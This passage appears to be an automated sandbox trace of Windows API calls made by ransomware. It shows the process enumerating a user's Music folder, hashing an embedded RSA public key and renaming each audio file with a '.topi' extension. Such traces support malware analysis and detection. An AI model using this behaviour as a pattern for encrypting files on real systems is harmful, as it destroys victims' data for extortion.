(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.221] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.221] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.221] CloseHandle (hObject=0x6a8) returned 1 [0097.223] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.223] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0097.223] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.223] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\m1BZ9r4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\m1bz9r4.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\m1BZ9r4.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\m1bz9r4.mp3.topi")) returned 1 [0097.224] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.224] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.224] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0097.225] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d6de50, ftCreationTime.dwHighDateTime=0x1d5b680, ftLastAccessTime.dwLowDateTime=0x48dfc8b0, ftLastAccessTime.dwHighDateTime=0x1d5be0f, ftLastWriteTime.dwLowDateTime=0x48dfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5be0f, nFileSizeHigh=0x0, nFileSizeLow=0x21e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TDB.wav", cAlternateFileName="")) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e39e8 [0097.226] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\TDB.wav") returned=".wav" [0097.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\TDB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\tdb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.226] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=8681) returned 1 [0097.226] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.229] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x21c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.229] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.230] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.230] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.230] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.230] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x21e9, lpOverlapped=0x0) returned 1 [0097.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.231] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.231] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.231] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.231] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.232] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.232] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.232] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.232] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.232] GetLastError () returned 0x0 [0097.232] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.232] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.232] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.232] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.232] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x21f0) returned 0x99fb2d8 [0097.233] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a032d8 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ce8 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03320 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d00 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d30 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d48 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.233] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d48 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4d30 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.234] GetCurrentThreadId () returned 0x8c4 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9380 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.234] GetCurrentThreadId () returned 0x8c4 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d30 [0097.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.236] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\TDB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\tdb.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\TDB.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\tdb.wav.topi")) returned 1 [0097.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.237] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0097.238] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d6de50, ftCreationTime.dwHighDateTime=0x1d5b680, ftLastAccessTime.dwLowDateTime=0x48dfc8b0, ftLastAccessTime.dwHighDateTime=0x1d5be0f, ftLastWriteTime.dwLowDateTime=0x48dfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5be0f, nFileSizeHigh=0x0, nFileSizeLow=0x21e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TDB.wav", cAlternateFileName="")) returned 0 [0097.238] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e20 | out: hHeap=0x680000) returned 1 [0097.238] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.238] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\") returned="FyEWgj\\" [0097.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0097.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0097.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.238] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.238] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.238] PathFindFileNameW (pszPath="") returned="" [0097.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\2 g1mb.wav") returned=".wav" [0097.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\2 g1mb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\2 g1mb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.239] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=27050) returned 1 [0097.239] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.242] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6984, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.242] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.243] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.243] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x69aa, lpOverlapped=0x0) returned 1 [0097.243] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.243] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.243] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.243] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.244] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.244] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.244] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.244] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.244] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.244] GetLastError () returned 0x0 [0097.244] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.245] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.245] UuidCreate (in: Uuid=0x9ccfa48 | out: 